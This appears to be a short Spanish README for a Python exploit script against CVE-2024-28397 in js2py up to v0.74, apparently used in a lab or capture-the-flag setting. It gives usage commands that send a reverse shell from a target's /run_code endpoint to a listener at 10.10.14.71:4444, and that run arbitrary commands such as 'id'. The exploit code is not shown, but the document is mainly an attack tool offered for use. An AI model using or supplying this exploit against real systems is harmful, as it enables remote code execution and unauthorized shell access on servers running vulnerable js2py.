
# Script de explotación en Python para CVE-2024-28397 dirigido a js2py <= v0.74. Admite reverse shell y ejecución de comandos personalizados mediante endpoint HTTP.
Payload de reverse shell por defecto y argumento de comando opcional permitido
el exploit funciona para js2py <= v0.74
requests (pip install requests)Reverse shell:
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
Comando personalizado:
python exploit.py 10.129.227.108 /run_code --cmd "id"